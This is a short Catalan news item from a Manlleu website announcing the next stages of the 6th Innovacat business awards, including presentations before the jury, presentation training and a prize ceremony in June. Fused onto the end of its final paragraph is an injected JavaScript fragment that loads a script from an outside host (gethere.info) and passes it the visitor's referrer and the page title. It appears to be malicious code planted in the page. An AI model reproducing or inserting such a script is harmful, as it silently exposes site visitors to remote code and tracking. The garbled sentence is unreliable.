• Inici
  • Butlletí
  • Propers passos de la 6a convocatòria dels Premis Innovacat

Propers passos de la 6a convocatòria dels Premis Innovacat

El passat divendres va finalitzar la presentació de candidatures a la 6a edició dels Premis Innovacat. A partir d’ara, els premis entren en la fase de validació i anàlisi dels projectes empresarials presentats.

El proper esdeveniment serà la presentació en públic dels projectes que faran els seus representants davant del jurat. Per a aquest acte, l’OPE oferirà una formació per ajudar a fer una bona presentació oral, tant en contingut com en forma.

Innovacat finalitzarà a finals de juny amb l’acte de lliurament de premis a les empreses guanyadores.

L’Ajuntament de Manlleu i les empreses Bon Preu, Casa Tarradellas, Girbau, La Farga Group, Seidor i Technotraf han convocat aquesta 6a edició dels Premis Innovacat.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetes,

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa